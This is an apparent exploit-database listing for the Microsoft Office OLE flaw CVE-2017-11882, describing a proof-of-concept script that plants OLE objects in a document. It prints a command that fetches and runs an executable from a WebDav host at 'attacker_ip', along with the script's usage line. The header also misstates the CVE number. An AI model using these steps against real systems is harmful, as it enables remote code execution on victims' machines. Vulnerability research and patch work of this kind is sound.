Microsoft Office - OLE Remote Code Execution Exploit

🗓️ 21 Nov 2017 00:00:00Reported by embediType

zdt🔗 0day.today👁 141 Views

Remote code execution exploit for Microsoft Office using CVE-2017-1188

Reporter	Title	Published	Views	Family All 608
GithubExploit	Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Microsoft	25 Jan 202112:44	–	githubexploit
GithubExploit	Exploit for CVE-2026-21509	27 Jan 202609:26	–	githubexploit
GithubExploit	Exploit for CVE-2026-21509	27 Jan 202613:56	–	githubexploit
GithubExploit	Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Microsoft	16 Jan 201805:49	–	githubexploit
GithubExploit	Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Microsoft	21 Nov 201715:22	–	githubexploit
GithubExploit	Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Microsoft	20 Nov 201716:35	–	githubexploit
GithubExploit	Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Microsoft	30 Dec 201713:20	–	githubexploit
GithubExploit	Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Microsoft	12 Jan 201811:38	–	githubexploit
GithubExploit	Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Microsoft	22 Nov 201701:11	–	githubexploit
GithubExploit	Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Microsoft	21 Nov 201715:22	–	githubexploit

Source: https://github.com/embedi/CVE-2017-11882
 
CVE-2017-11882: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/
 
MITRE CVE-2017-11882: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11882
 
Research: https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about
 
Patch analysis: https://0patch.blogspot.ru/2017/11/did-microsoft-just-manually-patch-their.html
 
DEMO PoC exploitation: https://www.youtube.com/watch?v=LNFG0lktXQI&lc=z23qixrixtveyb2be04t1aokgz10ymfjvfkfx1coc3qhrk0h00410
 
webdav_exec CVE-2017-11882
 
A simple PoC for CVE-2017-11882. This exploit triggers WebClient service to start and execute remote file from attacker-controlled WebDav server. The reason why this approach might be handy is a limitation of executed command length. However with help of WebDav it is possible to launch arbitrary attacker-controlled executable on vulnerable machine. This script creates simple document with several OLE objects. These objects exploits CVE-2017-11882, which results in sequential command execution.
 
The first command which triggers WebClient service start may look like this:
 
cmd.exe /c start \\attacker_ip\ff
Attacker controlled binary path should be a UNC network path:
 
\\attacker_ip\ff\1.exe
Usage
 
webdav_exec_CVE-2017-11882.py -u trigger_unc_path -e executable_unc_path -o output_file_name
Sample exploit for CVE-2017-11882 (starting calc.exe as payload)
 
example folder holds an .rtf file which exploits CVE-2017-11882 vulnerability and runs calculator in the system.

#  0day.today [2017-12-31]  #

21 Nov 2017 00:00Current

8.7High risk

Vulners AI Score8.7

EPSS0.94354